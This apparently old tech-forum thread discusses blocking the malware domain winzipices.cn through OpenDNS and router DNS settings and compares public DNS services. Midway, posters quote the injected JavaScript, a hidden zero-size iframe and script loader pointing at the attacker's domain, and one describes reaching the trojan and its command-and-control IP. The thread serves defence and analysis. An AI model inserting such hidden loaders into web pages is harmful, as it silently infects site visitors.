Use OpenDNS to block winzipices.cn


Recommended Posts

You just go into your Network adapter settings, click properties, change the DNS server address, reboot your computer.

Thats the simpliest way

If you have a router, change the DNS servers of your router.

Its really easy..

http://www.opendns.com/start

The technology they use is simply amazing.. and it keeps getting better every day. Each day I hear about new improvements or ideas to the backend and frontend of OpenDNS and they are just simply amazing.

I do have a router, but is is connected (like I said above) in a delicate way to the rest of the network. To eliminate a double NAT setup, I currently have my router (Linksys WRT54G) acting as a wireless point (I think is the term) while the modem (SpeedStream 4500) does the routing. Hence, why I am so hesitant to try this.

If I were to try it, it wouldn't have any affect if I did it on an individual computer's DNS, the only way it would do something would be if I changed it on the modem right?

No offense but how? How would this be different from using my ISP's? Can't I already block/filter out tons of stuff with my router?

It's probably be slower than your ISP (It's about 20 times slower than my ISP's DNS server)

I just use dnsmasq (on my WRT54GL) myself.

Does anyone have any details on the malware itself? What browsers does it affect? What exactly does the malware do, etc? Or better yet, can someone upload the actual malware someplace?

The script being injected is winzipices.cn / 2.js (added space so people dont accidently go here) - DONT GO THERE, EVEN THOUGH ITS A JS FILE

The stuff in that JS file (2.js) is this:

document.write("<iframe <iframe src=http://winzipices.cn/2.asp width=0 height=0></iframe>")

5.js is this

if (navigator.systemLanguage=='zh-cn')

{

}

else{

document.write("http://winzipices.cn/5.js");

}

document.write ('<script language="javascript" type="text/javascript" src="http://js.users.51.la/1856986.js"></script>');

"You're already blocking winzipices.cn.

You're blocking Adware sites. This category includes winzipices.cn."

Looks like OpenDNS has already added it to the Adware list.

I am a moderator for OpenDNS and i have added it to the Adware category. Thats why.

I do have a router, but is is connected (like I said above) in a delicate way to the rest of the network. To eliminate a double NAT setup, I currently have my router (Linksys WRT54G) acting as a wireless point (I think is the term) while the modem (SpeedStream 4500) does the routing. Hence, why I am so hesitant to try this.

If I were to try it, it wouldn't have any affect if I did it on an individual computer's DNS, the only way it would do something would be if I changed it on the modem right?

Ahh, this took me a while to figure out. Ok, this makes sense

You are using your WRT54G basically as a DHCP server which uses ad-hoc, the default gateway of your router points to the IP address of your modem. The DNS settings of your router will be the address of your modem. Therefore, if you are able to change the DNS server address of your modem, that would be fine.

But if you dont feel comfortable doing it.. dont.

I dont think it would mess up your setup.

I already use OpenDNS, but as an extra precaution added the listed domains and IP addreses at the SANS site into my router's block-list.

--ScottKin

That works too.

I (Personally) just blocked all access to any .cn site.

I cant read that language.. so I have no use for those kinds of sites.

@Jonathan:

So, I've visited all the above mentioned sites, and the sites in the google search, and the winzipices site itself, executed all the .js files, created a local html and manually added the scripts and I see nothing happening. I did this on a windows 2003 machine on an admin account on IE 6 with its security and privacy settings resetted to the lowest level, without any antivirus, firewall, antispyware, adblocker, DEP, etc.

Scanned my PC but no trojans were found, confirmed this with procmon, procexp, autoruns and rootkitrevealer.

So is there a bug in this bug or am I missing something?

---

Can someone confirm this in their VM, if they're able to get to the actual trojan?

--

Edit: Managed to manually find the links to the actual malware. Seems one needs to have realplayer installed for it to download and execute automatically. Tested the actual malware- it's a trojan that receives and executes instructions via a config file. At this point of time, it didn't seem to perform any malicious commands as the config file didn't contain any. It just downloaded a second file which makes requests to 61.134.37.15:1800.

I'll get RP later and see if I can manage to get the trojan to auto-execute.

--

Btw, I highly recommend blocking 61.134.37.15 and 61.188.38.158 , in addition to winzipices.cn

A good news for AV users is that the majority of them have already added this to their database- except McAfee, Avast and ClamAV.

http://www.virustotal.com/analisis/4e5fead...dea811ea5e41d0b

Edited by [deXter]

@Jonathan:

So, I've visited all the above mentioned sites, and the sites in the google search, and the winzipices site itself, executed all the .js files, created a local html and manually added the scripts and I see nothing happening. I did this on a windows 2003 machine on an admin account on IE 6 with its security and privacy settings resetted to the lowest level, without any antivirus, firewall, antispyware, adblocker, DEP, etc.

Scanned my PC but no trojans were found, confirmed this with procmon, procexp, autoruns and rootkitrevealer.

So is there a bug in this bug or am I missing something?

---

Can someone confirm this in their VM, if they're able to get to the actual trojan?

--

Edit: Managed to find the links to the actual malware. Seems one needs to have realplayer installed for it to run/execute automatically.

Interesting..

I havent personally tested it, as i dont want to get the malware, lol.

@Tem, and others:

You can also use DNS Advantage and ScrubIT.

The basic advantages are:

- Faster browsing

- Site blocking, independent of OS/software

- Content blocking (pornography, etc)

- Automatic protection against phishing

- Automatically fix typos in website names: Eg: Typing yaho.com or gppgle.com will lead you to their correct domains

These public DNS services are free, and generally will continue to remain free.

I personally prefer DNS Advantage as it has many servers worldwide, and particularly, they have a server located very close to where I live.

I don't mean to thread hi-jack...but I want to give this OpenDNS thing a try. What differences will I notice and how do they keep it free is my main questions? Sounds interesting. :)

Difference in page / site load time due to its very large DNS cache

More secure.. you can block adware category, so no more adware sites will ever load.. a malware category is coming soon btw.

Block porn sites too.

Block suspicious responses

Typo corrections

Network shortcuts

OpenDNS keeps it free cause they get revenue from the ads they have from Overture running on the guide / search pages.

Also, they do have paid features, for business who need extra features, but OpenDNS cant provide those for free. and i mean the really big businesses.

@Tem, and others:

You can also use DNS Advantage and ScrubIT.

The basic advantages are:

- Faster browsing

- Site blocking, independent of OS/software

- Content blocking (pornography, etc)

- Automatic protection against phishing

- Automatically fix typos in website names: Eg: Typing yaho.com or gppgle.com will lead you to their correct domains

These public DNS services are free, and generally will continue to remain free.

I personally prefer DNS Advantage as it has many servers worldwide, and particularly, they have a server located very close to where I live.

DNS Advantage is like a cheap knockoff of OpenDNS, they even use the same terminology "dashboard"

I haven't heard one explanation about making sites load faster, I've just heard the claim repeated.

OpenDNS has servers situated strategically at the most well-connected intersections of the Internet. Unlike your ISP, our network uses Anycast routing technology, which means no matter where you are in the world your DNS requests are answered by our closest datacenter. Anycast routing also means that you are automatically routed to our next closest datacenter in the event of maintenance or downtime. This makes your Internet faster and more reliable.

network_map.gif

How we're faster: We have really large caches

Most DNS servers have a small cache. We operate the largest caches in the world (and on the Internet, size matters). This means when you type a website into your address bar, the site loads immediately, instead of making you wait for a small cache to find the answer.

cache.gif

my ISP's DNS server is one hop away and can return uncached entries in around 10ms. That's still not going to make my connection faster though.

And OpenDNS caches are going to expire at the same time as my ISP's caches, unless OpenDNS is ignoring the TTL.

DNS Advantage is like a cheap knockoff of OpenDNS, they even use the same terminology "dashboard"

Maybe, but that doesn't change the fact that they're way faster than OpenDNS (for me). I'm quite surprised that despite being around for so many years, they have such few servers (5, 1 upcoming), while DNS Advantage has so many (14, 3 upcoming).

Node_locations.png

--

Also, I fail to see how OpenDNS's servers are "situated strategically", considering the fact that most of them ('cept one) are located in the US -_-

In any case, a little bit of competition never harmed anyone :)

Edited by [deXter]
This topic is now closed to further replies.
  • Recently Browsing   0 members

    • No registered users viewing this page.
  • Posts

    • But the reality is it will work for people's needs, and they don't care about the technology that makes it. Clearly not everyone's needs, but that low end space where personal laptops were only used to type emails, watch content and browse websites, but they didn't want to do that on a small screen device. Heck, writing that out I can now see the connection and reason it'll do so well. Apple is about experience. If the experience is bad, they don't release it. Low end Windows laptop manufacturers up until this point have not taken that into consideration ever before, so slow laggy usage with brittle slimey plastic shells were common. I hope that the low end space at least creates better physical products that last a bit longer, and if Microsoft get their act together, they could also have a solid OS on such low end hardware that would actually make the experience work for what the hardware was intended for. The fact that the CPU is a "cellphone", sorry mobile phone processor is irrelevant. It's about the experience, and so far, that sounds quite solid.
    • Hello, Bonjour is Apple's implementation of a multicast-DNS service, which allows devices running Apple's software and/or hardware to find each other on your local network.  I believe the Windows version was last updated around 2010. If you do not need it, you can stop and disable the Bonjour service in the Services Control Manager (filename: SERVICES.MSC).  Once you have done that, the operating system will no longer attempt to load the service. Regards, Aryeh Goretsky  
    • This AMD RX 9070 16GB GPU that performs close to Nvidia 5070 is under $600 by Sayan Sen With the memory shortage that's prevalent nowadays, discounts are super-hard to get. As such we post good deals whenever they pop up. Recently, we covered a few great discounts on SSDs wherein you can get a 4TB TeamGroup NVMe PCIe Gen4 drive for just $400 thanks to a special coupon. If you want a faster product but don't need all that capacity, you can also opt for Samsung's 990 PRO 2TB that is on sale for its lowest price in over three months. Let's say though that you are on the hunt for a 1440p gaming card. In that case AMD's RX 9070 non-XT can help, and with its 16GB VRAM, you can also run AI models locally without worrying about bottlenecking (check out our recent 9070 GRE reviews for gaming and productivity to get an idea). The PowerColor Reaper variant of the RX 9070 is currently on sale for just $580 which is a very good price in the current state of affairs (purchase link under the specs table down below). The Reaper cooler on this 9070 uses a triple‑fan design with ring‑blade fans, paired with premium dual ball bearings to extend lifespan and reduce friction. "Intelligent" fan control allows the fans to remain idle at lower temperatures, only spinning up when the GPU is under load. A nickel‑plated copper base makes direct contact with both the GPU and memory modules, helping to spread heat evenly. PowerColor also applies Honeywell PTM7950 phase‑change thermal interface material (TIM), which fills microscopic gaps between the die and heatsink for more efficient thermal transfer. The fan shroud is shorter in height as the firm has made it such that it can be used in certain SFF (small form factor) cases. The technical specifications of the Reaper RX 9070 are given in the table below: Specification Value Stream Processors 3584 Units Video Memory 16GB GDDR6 Memory Speed 20.0 Gbps Memory Interface 256-bit Engine Clock Game Clock: up to 2070 MHz Boost Clock: up to 2520 MHz Bus Standard PCI Express 5.0 x16 Display Connectors 1 x HDMI 2.1b, 3 x DisplayPort 2.1a Maximum Resolution DisplayPort: 7680 × 4320 HDMI: 7680 × 4320 Board Dimensions 289mm × 111mm × 41mm 304mm × 127mm × 42mm (with bracket) Slot 2 Minimum System Power Requirement 600W Power Connectors Two 8-pin PCI Express Get the PowerColor Reaper RX 9070 at the links below (you get only a 90-day warranty on Woot): PowerColor Reaper Radeon RX 9070 16GB Graphics Card (RX9070 16G-A): $579.99 (Sold and Shipped by Amazon US) (Was: $700) PowerColor Reaper Radeon RX 9070 16GB Graphics Card (RX9070 16G-A): $559.99 (Sold and Shipped by Woot US) Good to know This Amazon deal is U.S. specific, and not available in other regions unless specified. We only use first-party seller links (at the time of article publishing); ensure that you purchase from a first-party seller link only. Check out Today's Deals on Amazon | or our recent tech deals. Become a Prime member (for Students or SNAP) via Neowin Get Prime Access - Prime for half price (for qualifying Medicaid, EBT, SNAP) Subscribe to Prime Video, Audible Plus, Music Unlimited or Kindle Unlimited via Neowin As an Amazon Associate, we earn from qualifying purchases.
    • Are they marketed as an entry into astronomy or astrophotography? I do astrophotography. With big rigs, lots of computers, cables and headaches. I love it. And by learning this ridiculously complex hobby, I’ve learned about the objects I’m shooting. Astronomy followed from photography.
    • Microsoft confirms Recycle Bin bug across all versions of Windows by Usama Jawad A couple of days ago, we reported that the latest Patch Tuesday update has seemingly resulted in a lot of issues for many users, including OneDrive and Dropbox access problems, BitLocker recovery lockouts, and BSODs. Although Microsoft is yet to acknowledge these bugs, it has confirmed another, relatively smaller issue across all supported versions of Windows. In an update on its Windows Release Health Dashboard, Microsoft has confirmed that after installing June's Patch Tuesday update (KB5094126), you'll experience unexpected behavior when leveraging Recycle Bin. Basically, when you attempt to delete an item from the Recycle Bin, the confirm dialog will show you the internal file name of that content rather than the actual name. For example, the file may be named abc.png, but the confirm dialog will ask if you're sure that you want to permanently delete $Rxxxxx.png from the Recycle Bin. This is pretty much it for the scope of the bug itself; it just displays the wrong name in the confirm dialog. The correct name will be shown in the list view of the Recycle Bin and if you restore the file, it will return with the correct name as well. This issue affects pretty much all supported versions of Windows client and server, including: Client: Windows 11, version 26H1; Windows 11, version 25H2; Windows 11, version 24H2; Windows 11, version 23H2; Windows 10, version 22H2; Windows 10 Enterprise LTSC 2021; Windows 10 Enterprise LTSC 2019; Windows 10 Enterprise LTSB 2016 Server: Windows Server 2025; Windows Server 2022; Windows Server 2019; Windows Server 2016; Windows Server 2012 R2; Windows Server 2012 As things currently stand, Microsoft is working on a concrete solution that will be released in a "future" Windows update. It remains to be seen if the firm will wait till the next Patch Tuesday or roll out an out-of-band (OOB) fix. The good news is that commercial customers can deploy a workaround right now, but they will have to reach out to Microsoft Support for Business for additional details.
  • Recent Achievements

    • Week One Done
      Jordan Smith earned a badge
      Week One Done
    • Reacting Well
      BizSAR earned a badge
      Reacting Well
    • First Post
      AndreaB earned a badge
      First Post
    • Week One Done
      Huge Trailer earned a badge
      Week One Done
    • Week One Done
      Classifyskilleducation earned a badge
      Week One Done
  • Popular Contributors

    1. 1
      +primortal
      578
    2. 2
      +Edouard
      184
    3. 3
      PsYcHoKiLLa
      75
    4. 4
      Michael Scrip
      72
    5. 5
      neufuse
      64
  • Tell a friend

    Love Neowin? Tell a friend!